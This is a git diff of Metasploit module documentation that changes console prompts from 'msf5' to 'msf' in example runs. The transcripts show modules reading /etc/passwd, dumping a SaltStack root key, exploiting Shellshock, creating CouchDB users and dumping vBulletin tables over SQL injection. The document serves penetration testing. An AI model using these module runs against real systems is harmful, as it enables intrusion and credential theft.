@@ -189,5 +189,5 @@ proc /proc proc defaults 0 0 none /dev/pts devpts gid=5,mode=620 0 0 [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` diff --git a/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md b/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md index 5a4c490d07..9cf7daf612 100644 --- a/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md +++ b/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md @@ -38,8 +38,8 @@ ``` -msf5 > use auxiliary/gather/rails_doubletap_file_read -msf5 auxiliary(gather/rails_doubletap_file_read) > options +msf > use auxiliary/gather/rails_doubletap_file_read +msf auxiliary(gather/rails_doubletap_file_read) > options Module options (auxiliary/gather/rails_doubletap_file_read): @@ -53,13 +53,13 @@ Module options (auxiliary/gather/rails_doubletap_file_read): TARGET_FILE /etc/passwd yes The absolute path of remote file to read. VHOST no HTTP server virtual host -msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost +msf auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost RHOSTS => localhost -msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000 +msf auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000 RPORT => 8000 -smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo +smsf auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo ROUTE => /demo -msf5 auxiliary(gather/rails_doubletap_file_read) > run +msf auxiliary(gather/rails_doubletap_file_read) > run [*] Running module against 127.0.0.1 [+] Target is vulnerable! diff --git a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md index c0abe112aa..83f3994a9c 100644 --- a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md +++ b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md 
@@ -74,8 +74,8 @@ method and extracting the key from the resulting serialized auth info. ### SaltStack Salt 2019.2.3 on Ubuntu 18.04 ``` -msf5 > use auxiliary/gather/saltstack_salt_root_key -msf5 auxiliary(gather/saltstack_salt_root_key) > options +msf > use auxiliary/gather/saltstack_salt_root_key +msf auxiliary(gather/saltstack_salt_root_key) > options Module options (auxiliary/gather/saltstack_salt_root_key): @@ -92,9 +92,9 @@ Auxiliary action: Dump Dump root key from Salt master -msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5 +msf auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5 rhosts => 172.28.128.5 -msf5 auxiliary(gather/saltstack_salt_root_key) > run +msf auxiliary(gather/saltstack_salt_root_key) > run [*] Running module against 172.28.128.5 [*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506 @@ -114,7 +114,7 @@ msf5 auxiliary(gather/saltstack_salt_root_key) > run [+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= [*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506 [*] Auxiliary module execution completed -msf5 auxiliary(gather/saltstack_salt_root_key) > creds +msf auxiliary(gather/saltstack_salt_root_key) > creds Credentials =========== @@ -122,5 +122,5 @@ host origin service public private ---- ------ ------- ------ ------- ----- ------------ ---------- 172.28.128.5 172.28.128.5 4506/tcp (salt/zeromq) root bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= Password -msf5 auxiliary(gather/saltstack_salt_root_key) > +msf auxiliary(gather/saltstack_salt_root_key) > ``` diff --git a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md index 639d3a163c..1a06d02a88 100644 --- a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md 
+++ b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md @@ -59,13 +59,13 @@ The base URI path of vBulletin. **Default: /** ## Scenarios ``` -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100 +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100 RHOSTS => 192.168.1.100 -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local VHOST => vb.local -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI / +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI / TARGETURI => /vb5 -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions Auxiliary actions: @@ -74,7 +74,7 @@ Auxiliary actions: DumpAll Dump all tables used by vbulletin. DumpUser Dump only user table used by vbulletin. -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > run [*] Running module against 192.168.1.100 [*] Brute forcing to find a valid node id. diff --git a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md index 8f73c25980..1b32eaef29 100644 --- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md +++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md 
@@ -74,9 +74,9 @@ Auxiliary action: View the full module info with the info, or info -d command. -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted] +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > run [*] Running module against [redacted] not verifying SSL hostname of LDAPS server '[redacted]:636' @@ -115,5 +115,5 @@ vmwpasswordprohibitedpreviouscount: [redacted] [+] Credentials found: [redacted] [snip] [*] Auxiliary module execution completed -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > ``` diff --git a/documentation/modules/auxiliary/gather/xymon_info.md b/documentation/modules/auxiliary/gather/xymon_info.md index 75f7c870ff..e595c28f22 100644 --- a/documentation/modules/auxiliary/gather/xymon_info.md +++ b/documentation/modules/auxiliary/gather/xymon_info.md @@ -48,10 +48,10 @@ ## Scenarios ``` - msf5 > use auxiliary/gather/xymon_info - msf5 auxiliary(gather/xymon_info) > set rhosts 172.16.191.250 + msf > use auxiliary/gather/xymon_info + msf auxiliary(gather/xymon_info) > set rhosts 172.16.191.250 rhosts => 172.16.191.250 - msf5 auxiliary(gather/xymon_info) > run + msf auxiliary(gather/xymon_info) > run [*] Running module against 172.16.191.250 [*] 172.16.191.250:1984 - Xymon daemon version 4.3.28 @@ -68,7 +68,7 @@ [*] 172.16.191.250:1984 - test-host client log is empty [*] 172.16.191.250:1984 - another-test-host client log is empty [*] Auxiliary module execution completed - msf5 auxiliary(gather/xymon_info) > creds + msf auxiliary(gather/xymon_info) > creds Credentials =========== diff --git a/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md b/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md index 8680d11233..b787bdbde8 100644 
--- a/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md +++ b/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md @@ -5,9 +5,9 @@ This module targets Apache ZooKeeper service instances to extract information ab ### Verification Steps ``` -msf5 > use auxiliary/gather/zookeeper_info_disclosure -msf5 auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7 -msf5 auxiliary(gather/zookeeper_info_disclosure) > show options +msf > use auxiliary/gather/zookeeper_info_disclosure +msf auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7 +msf auxiliary(gather/zookeeper_info_disclosure) > show options Name: Apache ZooKeeper Information Disclosure Module: auxiliary/gather/zookeeper_info_disclosure @@ -39,7 +39,7 @@ References: https://zookeeper.apache.org/doc/current/zookeeperAdmin.html -msf5 auxiliary(gather/zookeeper_info_disclosure) > run +msf auxiliary(gather/zookeeper_info_disclosure) > run [*] 1.3.3.7:2181 - Using a timeout of 30... [*] 1.3.3.7:2181 - Verifying if service is responsive... @@ -90,8 +90,8 @@ Node count: 1041 [*] Auxiliary module execution completed -msf5 auxiliary(gather/zookeeper_info_disclosure) > -msf5 auxiliary(gather/zookeeper_info_disclosure) > loot +msf auxiliary(gather/zookeeper_info_disclosure) > +msf auxiliary(gather/zookeeper_info_disclosure) > loot Loot ==== @@ -102,7 +102,7 @@ host service type name content info 1.3.3.7 stat-log ZooKeeper Stat Log text/plain ZooKeeper /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt -msf5 auxiliary(gather/zookeeper_info_disclosure) > services +msf auxiliary(gather/zookeeper_info_disclosure) > services Services ======== @@ -110,7 +110,7 @@ host port proto name state info ---- ---- ----- ---- ----- ---- 1.3.3.7 2181 tcp zookeeper open Apache Zookeeper: 3.4.13-2--1 -msf5 auxiliary(gather/zookeeper_info_disclosure) > hosts +msf auxiliary(gather/zookeeper_info_disclosure) > hosts Hosts ===== 
diff --git a/documentation/modules/auxiliary/scanner/afp/afp_server_info.md b/documentation/modules/auxiliary/scanner/afp/afp_server_info.md index bdc2b74f9d..bab00d03aa 100644 --- a/documentation/modules/auxiliary/scanner/afp/afp_server_info.md +++ b/documentation/modules/auxiliary/scanner/afp/afp_server_info.md @@ -32,10 +32,10 @@ The following was done on Ubuntu 16.04, and is largely based on [missingreadme.w ### Ubuntu 16.04 with Netatalk 2.2.5 ``` - msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info - msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1 + msf auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info + msf auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/afp/afp_server_info) > run + msf auxiliary(scanner/afp/afp_server_info) > run [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning... [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP: diff --git a/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md b/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md index 6a76dc4f9f..9bec15a26c 100644 --- a/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md +++ b/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md @@ -33,8 +33,8 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https Dumping databases with `SERVERINFO` and `CREATEUSER` set: ``` -msf5 > use auxiliary/scanner/couchdb/couchdb_enum -msf5 auxiliary(scanner/couchdb/couchdb_enum) > options +msf > use auxiliary/scanner/couchdb/couchdb_enum +msf auxiliary(scanner/couchdb/couchdb_enum) > options Module options (auxiliary/scanner/couchdb/couchdb_enum): 
@@ -52,19 +52,19 @@ Module options (auxiliary/scanner/couchdb/couchdb_enum): TARGETURI /_all_dbs yes Path to list all the databases VHOST no HTTP server virtual host -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1 +msf auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true +msf auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true serverinfo => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true +msf auxiliary(scanner/couchdb/couchdb_enum) > set createuser true createuser => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true +msf auxiliary(scanner/couchdb/couchdb_enum) > set verbose true verbose => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > check +msf auxiliary(scanner/couchdb/couchdb_enum) > check [+] 127.0.0.1:5984 - Found CouchDB version 2.1.0 [*] 127.0.0.1:5984 - The target appears to be vulnerable. -msf5 auxiliary(scanner/couchdb/couchdb_enum) > run +msf auxiliary(scanner/couchdb/couchdb_enum) > run [+] 127.0.0.1:5984 - Found CouchDB version 2.1.0 [+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login. @@ -92,5 +92,5 @@ msf5 auxiliary(scanner/couchdb/couchdb_enum) > run [+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin [+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin [*] Auxiliary module execution completed -msf5 auxiliary(scanner/couchdb/couchdb_enum) > +msf auxiliary(scanner/couchdb/couchdb_enum) > ``` diff --git a/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md b/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md index ce4d9c8f3e..fd03cb1a6f 100644 --- a/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md 
+++ b/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md @@ -52,14 +52,14 @@ The following was done on Ubuntu 16.04, and is largely based on [1and1.com](http A run against the configuration from these docs ``` - msf5 > use auxiliary/scanner/couchdb/couchdb_login - msf5 auxiliary(scanner/couchdb/couchdb_login) > set rhosts 1.1.1.1 + msf > use auxiliary/scanner/couchdb/couchdb_login + msf auxiliary(scanner/couchdb/couchdb_login) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/couchdb/couchdb_login) > set username anna + msf auxiliary(scanner/couchdb/couchdb_login) > set username anna username => anna - msf5 auxiliary(scanner/couchdb/couchdb_login) > set password secret + msf auxiliary(scanner/couchdb/couchdb_login) > set password secret password => secret - msf5 auxiliary(scanner/couchdb/couchdb_login) > run + msf auxiliary(scanner/couchdb/couchdb_login) > run [*] 1.1.1.1:5984 - [001/305] - Trying username:'connect' with password:'connect' [*] 1.1.1.1:5984 - [002/305] - Trying username:'sitecom' with password:'sitecom' diff --git a/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md b/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md index a342b1958b..01b1adfda2 100644 --- a/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md +++ b/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md 
@@ -24,7 +24,7 @@ More information can be found on the [Rapid7 Vulnerability & Exploit Database pa [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ... [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] [*] Sending X64 Client Unattend request ... - [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt + [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt [+] Retrieved wds credentials for X64 [*] Sending X86 Client Unattend request ... [*] Sending IA64 Client Unattend request ... diff --git a/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md b/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md index 2bf496627f..8801a9b189 100644 --- a/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md +++ b/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md @@ -29,10 +29,10 @@ unauthenticated users access to the data stored via HTTP API. ### etcd 3.2.15 on CentOS 7.1 ``` -msf5 > use auxiliary/scanner/etcd/open_key_scanner -msf5 auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2 +msf > use auxiliary/scanner/etcd/open_key_scanner +msf auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/etcd/open_key_scanner) > run +msf auxiliary(scanner/etcd/open_key_scanner) > run [+] 2.2.2.2:2379 Version: {"etcdserver":"3.2.15","etcdcluster":"3.2.0"} 
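Review bot: in the windows_deployment_services.md hunk above, the change from `.msf5/loot/` to `.msf/loot/` looks like collateral from the prompt search-and-replace. That line is captured module output containing a loot path, not a console prompt, and the other loot paths visible in this patch are left as `.msf4/loot/`. Please drop this hunk, or confirm the directory name separately, rather than rewriting recorded output to a path the example run did not produce.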
@@ -58,7 +58,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- 2.2.2.2 etcd.data etcd.keys text/plain etcd keys /root/.msf4/loot/20180325144351_default_2.2.2.2_etcd.data_425280.txt -msf5 auxiliary(scanner/etcd/open_key_scanner) > services +msf auxiliary(scanner/etcd/open_key_scanner) > services Services ======== @@ -70,10 +70,10 @@ host port proto name state info ### etcd in Docker ``` -msf5 > use auxiliary/scanner/etcd/open_key_scanner -msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1 +msf > use auxiliary/scanner/etcd/open_key_scanner +msf auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 -msf5 auxiliary(scanner/etcd/open_key_scanner) > run +msf auxiliary(scanner/etcd/open_key_scanner) > run [+] 127.0.0.1:2379 Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"} @@ -85,7 +85,7 @@ Data: { } [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/etcd/open_key_scanner) > loot +msf auxiliary(scanner/etcd/open_key_scanner) > loot Loot ==== @@ -94,7 +94,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- 127.0.0.1 etcd.data etcd.keys text/json etcd keys /root/.msf4/loot/20180328092245_default_127.0.0.1_etcd.data_260058.txt -msf5 auxiliary(scanner/etcd/open_key_scanner) > services +msf auxiliary(scanner/etcd/open_key_scanner) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/etcd/version.md b/documentation/modules/auxiliary/scanner/etcd/version.md index 13b42f78d3..8cd856c768 100644 --- a/documentation/modules/auxiliary/scanner/etcd/version.md +++ b/documentation/modules/auxiliary/scanner/etcd/version.md 
@@ -20,15 +20,15 @@ etcd is a distributed reliable key-value store. It exposes and API from which y ### etcd in Docker ``` -msf5 > use auxiliary/scanner/etcd/version -msf5 auxiliary(scanner/etcd/version) > set RHOSTS localhost +msf > use auxiliary/scanner/etcd/version +msf auxiliary(scanner/etcd/version) > set RHOSTS localhost RHOSTS => localhost -msf5 auxiliary(scanner/etcd/version) > run +msf auxiliary(scanner/etcd/version) > run [+] 127.0.0.1:2379 : {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"} [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/etcd/version) > services +msf auxiliary(scanner/etcd/version) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/h323/h323_version.md b/documentation/modules/auxiliary/scanner/h323/h323_version.md index 0ec269de39..24634789ea 100644 --- a/documentation/modules/auxiliary/scanner/h323/h323_version.md +++ b/documentation/modules/auxiliary/scanner/h323/h323_version.md @@ -5,10 +5,10 @@ This module scans for h.323 servers and determines the version and information a ## Usage ``` -msf5 auxiliary(scanner/sip/options) > use auxiliary/scanner/h323/h323_version -msf5 auxiliary(scanner/h323/h323_version) > set rhosts 1.1.1.1 +msf auxiliary(scanner/sip/options) > use auxiliary/scanner/h323/h323_version +msf auxiliary(scanner/h323/h323_version) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(scanner/h323/h323_version) > run +msf auxiliary(scanner/h323/h323_version) > run [+] 1.1.1.1:1720 - 1.1.1.1:1720 Protocol: 3 VendorID: 0x6100023c VersionID: v.5.4 ProductID: Gateway [*] 1.1.1.1:1720 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md b/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md index dcce136196..08b3d64dc4 100644 --- a/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md 
+++ b/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md @@ -95,12 +95,12 @@ This is HTTP method used by the module. The default setting is `GET`. ### Ubuntu 12.04.5 LTS on Apache 2.2.22 ``` -msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134 +msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134 RHOSTS => 172.16.131.134 -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh TARGETURI => /cgi-bin/test.sh -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit [+] uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md b/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md index 419844f476..5d7b6d101b 100644 --- a/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md +++ b/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md @@ -22,10 +22,10 @@ that exist but have no `public_html` directory. ![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif) ``` -msf5 > use auxiliary/scanner/http/apache_userdir_enum -msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan +msf > use auxiliary/scanner/http/apache_userdir_enum +msf auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan rhosts => alderaan -msf5 auxiliary(scanner/http/apache_userdir_enum) > run +msf auxiliary(scanner/http/apache_userdir_enum) > run [*] http://192.168.6.172/~ - Trying UserDir: '' [*] http://192.168.6.172/ - Apache UserDir: '' not found 
diff --git a/documentation/modules/auxiliary/scanner/http/backup_file.md b/documentation/modules/auxiliary/scanner/http/backup_file.md index 0727434f86..a6d0d9ea79 100644 --- a/documentation/modules/auxiliary/scanner/http/backup_file.md +++ b/documentation/modules/auxiliary/scanner/http/backup_file.md @@ -20,14 +20,14 @@ In this scenario, we look for `/backup` instead. On the web server, we've creat `backup.orig`, and `backup~`. ``` -msf5 > use auxiliary/scanner/http/backup_file -msf5 auxiliary(scanner/http/backup_file) > set verbose true +msf > use auxiliary/scanner/http/backup_file +msf auxiliary(scanner/http/backup_file) > set verbose true verbose => true -msf5 auxiliary(scanner/http/backup_file) > set path /backup +msf auxiliary(scanner/http/backup_file) > set path /backup path => /backup -msf5 auxiliary(scanner/http/backup_file) > set rhosts 192.168.2.39 +msf auxiliary(scanner/http/backup_file) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/backup_file) > run +msf auxiliary(scanner/http/backup_file) > run [*] NOT Found http://192.168.2.39:80/backup.backup [*] NOT Found http://192.168.2.39:80/backup.bak diff --git a/documentation/modules/auxiliary/scanner/http/brute_dirs.md b/documentation/modules/auxiliary/scanner/http/brute_dirs.md index e140ad3718..f728417c0e 100644 --- a/documentation/modules/auxiliary/scanner/http/brute_dirs.md +++ b/documentation/modules/auxiliary/scanner/http/brute_dirs.md 
@@ -93,11 +93,11 @@ PORT STATE SERVICE Configure the `brute_dirs` module to use the identified IP address and port number: ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > set RPORT 8080 +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 +msf auxiliary(scanner/http/brute_dirs) > set RPORT 8080 RHOSTS => 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > run +msf auxiliary(scanner/http/brute_dirs) > run [*] Using code '404' as not found. [+] Found http://192.168.2.3:8080/dav/ 200 @@ -109,11 +109,11 @@ msf5 auxiliary(scanner/http/brute_dirs) > run ### Testing against multiple hosts using a CIDR ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > show options +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > show options ... show and set options ... -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.1/24 -msf5 auxiliary(scanner/http/brute_dirs) > run +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.1/24 +msf auxiliary(scanner/http/brute_dirs) > run ``` ### Custom format to find specifically formatted directories @@ -122,8 +122,8 @@ A format string of `Aaaaad` will search for 6 character directories, starting wi digit. E.g. ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > set FORMAT 'Aaaaad' -msf5 auxiliary(scanner/http/brute_dirs) > run +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 +msf auxiliary(scanner/http/brute_dirs) > set FORMAT 'Aaaaad' +msf auxiliary(scanner/http/brute_dirs) > run ``` 
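Review bot: in the first brute_dirs.md hunk (-93,11) the transcript order is off: `set RHOSTS 192.168.2.3` is followed by `set RPORT 8080` and only then by the `RHOSTS => 192.168.2.3` echo, and there is no `RPORT => 8080` line. While these prompt lines are being rewritten, reorder the block so each `set` is followed by its own echo; the two later hunks in this file omit the echoes entirely, so it is worth making all three examples consistent.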
diff --git a/documentation/modules/auxiliary/scanner/http/cgit_traversal.md b/documentation/modules/auxiliary/scanner/http/cgit_traversal.md index ca2896fc57..e6db7f5b1c 100644 --- a/documentation/modules/auxiliary/scanner/http/cgit_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/cgit_traversal.md @@ -69,18 +69,18 @@ Git repository on the remote server. Default is empty, `''`. ### Ubuntu 18.04 x64, cgit | 1.1+git2.10.2-3build1 ``` -msf5 > use auxiliary/scanner/http/cgit_traversal -msf5 auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123 +msf > use auxiliary/scanner/http/cgit_traversal +msf auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123 rhosts => 172.22.222.123 -msf5 auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/ +msf auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/ targeturi => /mygit/ -msf5 auxiliary(scanner/http/cgit_traversal) > set repo test +msf auxiliary(scanner/http/cgit_traversal) > set repo test repo => test -msf5 auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt +msf auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt filepath => /home/msfdev/proof.txt -msf5 auxiliary(scanner/http/cgit_traversal) > set verbose true +msf auxiliary(scanner/http/cgit_traversal) > set verbose true verbose => true -msf5 auxiliary(scanner/http/cgit_traversal) > run +msf auxiliary(scanner/http/cgit_traversal) > run [+] 172.22.222.123:80 - you found me! diff --git a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md index a102171128..e80d526a85 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md 
@@ -29,12 +29,12 @@ ### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` - msf5 > use auxiliary/scanner/http/cisco_device_manager - msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2 + msf > use auxiliary/scanner/http/cisco_device_manager + msf auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true + msf auxiliary(scanner/http/cisco_device_manager) > set vebose true vebose => true - msf5 auxiliary(scanner/http/cisco_device_manager) > run + msf auxiliary(scanner/http/cisco_device_manager) > run [+] 2.2.2.2:80 Successfully authenticated to this device [+] 2.2.2.2:80 Processing the configuration file... diff --git a/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md index 02e705d8e3..268137147f 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md @@ -21,10 +21,10 @@ ``` - msf5 > use auxiliary/scanner/http/cisco_directory_traversal - msf5 auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1 + msf > use auxiliary/scanner/http/cisco_directory_traversal + msf auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1 rhosts => 192.168.1.1 - msf5 auxiliary(scanner/http/cisco_directory_traversal) > run + msf auxiliary(scanner/http/cisco_directory_traversal) > run [+] /// [ diff --git a/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md b/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md index e5248520f3..1a41ab8a8e 100644 --- a/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md +++ 